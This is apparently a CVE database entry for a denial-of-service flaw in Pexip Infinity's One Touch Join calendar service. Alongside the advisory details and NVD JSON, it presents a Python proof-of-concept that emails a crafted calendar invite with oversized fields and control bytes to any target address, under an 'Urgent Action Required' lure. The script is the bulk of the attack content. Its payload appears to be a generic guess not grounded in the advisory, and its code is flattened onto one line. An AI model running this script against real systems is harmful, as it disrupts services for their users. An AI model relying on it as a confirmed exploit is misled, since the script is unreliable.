CVE-2025-49088

Description

Pexip Infinity 32.0 through 37.1 before 37.2, in certain configurations of OTJ (One Touch Join) for Teams SIP Guest Join, has Improper Input Validation in the OTJ service, allowing a remote attacker to trigger a software abort via a crafted calendar invite, leading to a denial of service.

CVSS Details

CVSS Score

5.9

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:pexip:pexip_infinity:*:*:*:*:*:*:*:* - VULNERABLE

Pexip Infinity 32.0

Pexip Infinity 33.0

Pexip Infinity 34.0

Pexip Infinity 35.0

Pexip Infinity 36.0

Pexip Infinity 37.0

Pexip Infinity 37.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3 """ CVE-2025-49088 PoC - Pexip Infinity OTJ Service DoS This PoC demonstrates sending a crafted calendar invite to trigger improper input validation in Pexip Infinity OTJ service. Note: This is for educational and authorized testing purposes only. """ import smtplib from email.mime.text import MIMEText from email.mime.multipart import MIMEMultipart from datetime import datetime, timedelta def create_crafted_calendar_invite(): """Generate a crafted iCalendar invite with malicious payload""" # Start time: tomorrow start_time = datetime.now() + timedelta(days=1) end_time = start_time + timedelta(hours=1) # Format for iCalendar (YYYYMMDDTHHMMSSZ) dtstart = start_time.strftime('%Y%m%dT%H%M%S') dtend = end_time.strftime('%Y%m%dT%H%M%S') uid = f"exploit-{datetime.now().strftime('%Y%m%d%H%M%S')}@attacker.com" # Crafted iCalendar with malicious payload in SUMMARY field # This payload exploits improper input validation crafted_payload = "A" * 10000 + "\n" + "B" * 10000 # Oversized field ical_content = f"""BEGIN:VCALENDAR VERSION:2.0 PRODID:-//Pexip//OTJ Exploit//EN METHOD:REQUEST BEGIN:VEVENT UID:{uid} DTSTAMP:{datetime.now().strftime('%Y%m%dT%H%M%S')}Z DTSTART:{dtstart} DTEND:{dtend} SUMMARY:{crafted_payload} DESCRIPTION:Test meeting with crafted payload for CVE-2025-49088\n\n\x00\x01\x02 ORGANIZER:mailto:[email protected] ATTENDEE;CN=Attacker;ROLE=REQ-PARTICIPANT:mailto:[email protected] END:VEVENT END:VCALENDAR""" return ical_content def send_crafted_invite(target_email, smtp_server='localhost', smtp_port=25): """Send the crafted calendar invite via email""" ical_content = create_crafted_calendar_invite() msg = MIMEMultipart('mixed') msg['From'] = '[email protected]' msg['To'] = target_email msg['Subject'] = 'Meeting Invitation - Urgent Action Required' # Attach the crafted iCalendar calendar_part = MIMEText(ical_content, 'calendar', 'utf-8') calendar_part.add_header('Content-Disposition', 'attachment', filename='meeting.ics') msg.attach(calendar_part) try: with smtplib.SMTP(smtp_server, smtp_port) as server: server.send_message(msg) print(f"[+] Crafted calendar invite sent to {target_email}") return True except Exception as e: print(f"[-] Failed to send: {e}") return False if __name__ == "__main__": import sys if len(sys.argv) < 2: print(f"Usage: {sys.argv[0]} <target_email> [smtp_server] [smtp_port]") sys.exit(1) target = sys.argv[1] smtp = sys.argv[2] if len(sys.argv) > 2 else 'localhost' port = int(sys.argv[3]) if len(sys.argv) > 3 else 25 send_crafted_invite(target, smtp, port)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-49088
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-49088
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-49088/
[4] VulDB https://vuldb.com/cve/CVE-2025-49088
[5] https://docs.pexip.com/admin/security_bulletins.htm

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-49088", "sourceIdentifier": "[email protected]", "published": "2025-12-25T05:16:07.420", "lastModified": "2026-01-05T19:31:32.783", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Pexip Infinity 32.0 through 37.1 before 37.2, in certain configurations of OTJ (One Touch Join) for Teams SIP Guest Join, has Improper Input Validation in the OTJ service, allowing a remote attacker to trigger a software abort via a crafted calendar invite, leading to a denial of service."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-617"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:pexip:pexip_infinity:*:*:*:*:*:*:*:*", "versionStartIncluding": "32.0", "versionEndExcluding": "37.2", "matchCriteriaId": "631F732D-7D98-499E-B1C9-FF697FF83348"}]}]}], "references": [{"url": "https://docs.pexip.com/admin/security_bulletins.htm", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}